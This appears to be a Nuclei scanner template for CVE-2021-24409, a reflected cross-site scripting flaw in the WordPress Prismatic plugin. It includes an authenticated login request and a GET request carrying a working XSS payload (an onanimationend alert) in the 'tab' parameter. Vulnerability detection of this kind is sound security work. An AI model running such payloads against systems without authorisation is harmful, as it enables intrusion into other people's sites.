38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
|
id: CVE-2021-24409
|
||
|
|
||
|
info:
|
||
|
name: Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)
|
||
|
author: Harsh
|
||
|
severity: medium
|
||
|
description: |
|
||
|
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
tags: wpscan,cve2023,wordpress,authenticated,cve,wp-plugin,xss
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||
|
|
||
|
- |
|
||
|
GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(%2FXSS%2F)%2F%2F%22 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code_2 == 200'
|
||
|
- 'contains(body_2, "onanimationend=alert(/XSS/)")'
|
||
|
condition: and
|